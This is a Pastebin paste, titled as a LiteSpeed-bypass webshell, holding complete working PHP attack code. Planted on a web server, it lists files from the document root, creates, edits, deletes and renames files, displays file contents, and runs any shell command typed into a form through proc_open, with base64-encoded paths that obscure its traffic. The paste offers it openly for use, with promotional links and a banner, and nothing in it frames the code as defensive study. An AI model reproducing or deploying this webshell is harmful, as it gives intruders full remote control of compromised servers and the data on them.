API tools faq
paste
afrizalwahyuadi66

Bypass Litespeed webshell

afrizalwahyuadi66
Mar 30th, 2024 (edited)
159
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.64 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #SUPPORT ME IN https://salamedia.id
  2. ===================================
  3.  
  4. <!DOCTYPE html>
  5. <html>
  6. <head>
  7.     <title>.:: support me salamedia.id ::.</title>
  8.     <link href="https://fonts.googleapis.com/css?family=Protest Revolution" rel="stylesheet">
  9.     <style>
  10.         body {
  11.              font-family: 'Protest Revolution';
  12.              color: red;
  13.              margin: 0;
  14.              padding: 0;
  15.              text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.5);
  16.              background-image: url('https://iphoneswallpapers.com/wp-content/uploads/2022/09/iPhone-13-RGB-Neon-Frame.jpg');
  17.              background-size: cover;
  18.              background-position: center;
  19. }
  20.         .container {
  21.             width: 90%;
  22.             margin: 20px auto;
  23.             padding: 20px;
  24.             background-color: #fff;
  25.             border-radius: 5px;
  26.             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  27.         }
  28.         .result-box {
  29.             width: 97.5%;
  30.             height: 200px;
  31.             resize: none;
  32.             overflow: auto;
  33.             font-family: 'Protest Revolution';
  34.             background-color: #f4f4f4;
  35.             padding: 10px;
  36.             border: 1px solid #ddd;
  37.             margin-bottom: 10px;
  38.         }
  39.         hr {
  40.             border: 0;
  41.             border-top: 1px solid #ddd;
  42.             margin: 20px 0;
  43.         }
  44.         table {
  45.             width: 100%;
  46.             border-collapse: collapse;
  47.             margin-top: 20px;
  48.         }
  49.         th, td {
  50.             padding: 8px;
  51.             text-align: left;
  52.         }
  53.         th {
  54.             background-color: #f2f2f2;
  55.         }
  56.         tr:nth-child(even) {
  57.             background-color: #f9f9f9;
  58.         }
  59.         tr:hover {
  60.             background-color: #f2f2f2;
  61.         }
  62.         input[type="text"], input[type="submit"], textarea[name="file_content"] {
  63.             width: calc(97.5% - 10px);
  64.             margin-bottom: 10px;
  65.             padding: 8px;
  66.             max-height: 200px;
  67.             resize: vertical;
  68.             border: 1px solid #ddd;
  69.             border-radius: 3px;
  70.             font-family: 'Protest Revolution';
  71.         }
  72.         input[type="submit"] {
  73.             background-color: #4CAF50;
  74.             color: white;
  75.             font-family: 'Protest Revolution';
  76.             border: none;
  77.             cursor: pointer;
  78.         }
  79.         input[type="submit"]:hover {
  80.             background-color: #45a049;
  81.         }
  82.         .item-name {
  83.             max-width: 200px;
  84.             overflow: hidden;
  85.             text-overflow: ellipsis;
  86.             white-space: nowrap;
  87.         }
  88.         td.size {
  89.     width: 100px;
  90. }
  91.  
  92.         .writable {
  93.             color: green;
  94.         }
  95.         .not-writable {
  96.             color: red;
  97.         }
  98.         .permission {
  99.         font-weight: bold;
  100.         width: 50px;
  101.         height: 20px;
  102.         text-align: center;
  103.         line-height: 20px;
  104.         overflow: hidden;
  105.     }
  106.  
  107.     </style>
  108. </head>
  109. <body>
  110. <div class="container">
  111. <?php
  112. $rootDirectory = realpath($_SERVER['DOCUMENT_ROOT']);
  113.  
  114. function x($b)
  115. {
  116.     return base64_encode($b);
  117. }
  118.  
  119. function y($b)
  120. {
  121.     return base64_decode($b);
  122. }
  123.  
  124. foreach ($_GET as $c => $d) $_GET[$c] = y($d);
  125.  
  126. $currentDirectory = realpath(isset($_GET['d']) ? $_GET['d'] : $rootDirectory);
  127. chdir($currentDirectory);
  128.  
  129. $viewCommandResult = '';
  130.  
  131. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  132.     if (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) {
  133.         $newFolder = $currentDirectory . '/' . $_POST['folder_name'];
  134.         if (!file_exists($newFolder)) {
  135.             mkdir($newFolder);
  136.             echo '<hr>Folder created successfully!';
  137.         } else {
  138.             echo '<hr>Error: Folder already exists!';
  139.         }
  140.     } elseif (isset($_POST['file_name']) && !empty($_POST['file_name'])) {
  141.         $fileName = $_POST['file_name'];
  142.         $newFile = $currentDirectory . '/' . $fileName;
  143.         if (!file_exists($newFile)) {
  144.             if (file_put_contents($newFile, $_POST['file_content']) !== false) {
  145.                 echo '<hr>File created successfully!';
  146.             } else {
  147.                 echo '<hr>Error: Failed to create file!';
  148.             }
  149.         } else {
  150.             if (file_put_contents($newFile, $_POST['file_content']) !== false) {
  151.                 echo '<hr>File edited successfully!';
  152.             } else {
  153.                 echo '<hr>Error: Failed to edit file!';
  154.             }
  155.         }
  156.     } elseif (isset($_POST['delete_file'])) {
  157.         $fileToDelete = $currentDirectory . '/' . $_POST['delete_file'];
  158.         if (file_exists($fileToDelete)) {
  159.             if (unlink($fileToDelete)) {
  160.                 echo '<hr>File deleted successfully!';
  161.             } else {
  162.                 echo '<hr>Error: Failed to delete file!';
  163.             }
  164.         } elseif (is_dir($fileToDelete)) {
  165.             if (deleteDirectory($fileToDelete)) {
  166.                 echo '<hr>Folder deleted successfully!';
  167.             } else {
  168.                 echo '<hr>Error: Failed to delete folder!';
  169.             }
  170.         } else {
  171.             echo '<hr>Error: File or directory not found!';
  172.         }
  173.     } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) {
  174.         $oldName = $currentDirectory . '/' . $_POST['old_name'];
  175.         $newName = $currentDirectory . '/' . $_POST['new_name'];
  176.         if (file_exists($oldName)) {
  177.             if (rename($oldName, $newName)) {
  178.                 echo '<hr>Item renamed successfully!';
  179.             } else {
  180.                 echo '<hr>Error: Failed to rename item!';
  181.             }
  182.         } else {
  183.             echo '<hr>Error: Item not found!';
  184.         }
  185.     } elseif (isset($_POST['cmd_input'])) {
  186.         $command = $_POST['cmd_input'];
  187.         $descriptorspec = [
  188.             0 => ['pipe', 'r'],
  189.             1 => ['pipe', 'w'],
  190.             2 => ['pipe', 'w']
  191.         ];
  192.         $process = proc_open($command, $descriptorspec, $pipes);
  193.         if (is_resource($process)) {
  194.             $output = stream_get_contents($pipes[1]);
  195.             $errors = stream_get_contents($pipes[2]);
  196.             fclose($pipes[1]);
  197.             fclose($pipes[2]);
  198.             proc_close($process);
  199.             if (!empty($errors)) {
  200.                 $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($errors) . '</textarea>';
  201.             } else {
  202.                 $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($output) . '</textarea>';
  203.             }
  204.         } else {
  205.             $viewCommandResult = '<hr><p>Error: Failed to execute command!</p>';
  206.         }
  207.     } elseif (isset($_POST['view_file'])) {
  208. $fileToView = $currentDirectory . '/' . $_POST['view_file'];
  209. if (file_exists($fileToView)) {
  210. $fileContent = file_get_contents($fileToView);
  211. $viewCommandResult = '<hr><p>Result: ' . $_POST['view_file'] . '</p><textarea class="result-box">' . htmlspecialchars($fileContent) . '</textarea>';
  212. } else {
  213. $viewCommandResult = '<hr><p>Error: File not found!</p>';
  214. }
  215. }
  216. }
  217. echo '<center>
  218.  
  219. <div class="fig-ansi">
  220. <pre id="taag_font_ANSIShadow" class="fig-ansi"><span style="color: #4CAF50;">   <strong>  __    Bye Bye Litespeed   _____ __    
  221.    __|  |___ ___ ___ ___ ___   |   __|  | v.1.2
  222. |  |  | .\'| . | . | .\'|   |  |__   |  |__
  223. |_____|__,|_  |___|__,|_|_|  |_____|_____|
  224.                |___| ./Heartzz                      </strong> </span></pre>
  225. </div>
  226. </center>';
  227. echo '<hr>curdir: ';
  228. $directories = explode(DIRECTORY_SEPARATOR, $currentDirectory);
  229. $currentPath = '';
  230. foreach ($directories as $index => $dir) {
  231.     if ($index == 0) {
  232.         echo '<a href="?d=' . x($dir) . '">' . $dir . '</a>';
  233.     } else {
  234.         $currentPath .= DIRECTORY_SEPARATOR . $dir;
  235.         echo ' / <a href="?d=' . x($currentPath) . '">' . $dir . '</a>';
  236.     }
  237. }
  238. echo '<br>';
  239. echo '<hr><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'">';
  240. echo '<input type="text" name="folder_name" placeholder="New Folder Name">';
  241. echo '<input type="submit" value="Create Folder">';
  242. echo '</form>';
  243.  
  244. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'">';
  245. echo '<input type="text" name="file_name" placeholder="Create New File / Edit Existing File">';
  246. echo '<textarea name="file_content" placeholder="File Content (for new file) or Edit Content (for existing file)"></textarea>';
  247. echo '<input type="submit" value="Create / Edit File">';
  248. echo '</form>';
  249.  
  250. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="cmd_input" placeholder="Enter command"><input type="submit" value="Run Command"></form>';
  251. echo $viewCommandResult;
  252. echo '<div>';
  253. echo '</div>';
  254. echo '<table border=1>';
  255. echo '<br><tr><th><center>Item Name</th><th><center>Size</th><th><center> View  </th><th><center>Delete </th><th>Permissions</th><th><center>Rename</th></tr></center></center></center>';
  256. foreach (scandir($currentDirectory) as $v) {
  257.     $u = realpath($v);
  258.     $s = stat($u);
  259.     $itemLink = is_dir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v));
  260.     $permission = substr(sprintf('%o', fileperms($v)), -4);
  261.     $writable = is_writable($v);
  262.     echo '<tr>
  263.            <td class="item-name"><a href="'.$itemLink.'">'.$v.'</a></td>
  264.            <td class="size">'.filesize($u).'</td>
  265.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="view_file" value="'.htmlspecialchars($v).'"><input type="submit" value="View"></form></td>
  266.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="delete_file" value="'.htmlspecialchars($v).'"><input type="submit" value="Delete"></form></td>
  267.            <td class="permission '.($writable ? 'writable' : 'not-writable').'">'.$permission.'</td>
  268.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="old_name" value="'.htmlspecialchars($v).'"><input type="text" name="new_name" placeholder="New Name"><input type="submit" name="rename_item" value="Rename"></form></td>
  269.        </tr>';
  270. }
  271.  
  272. echo '</table>';
  273. function deleteDirectory($dir) {
  274. if (!file_exists($dir)) {
  275. return true;
  276. }
  277. if (!is_dir($dir)) {
  278. return unlink($dir);
  279. }
  280. foreach (scandir($dir) as $item) {
  281. if ($item == '.' || $item == '..') {
  282. continue;
  283. }
  284. if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
  285. return false;
  286. }
  287. }
  288. return rmdir($dir);
  289. }
  290. ?>
  291.  
  292. </div>
  293. </body>
  294. </html>
Tags: Shell
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!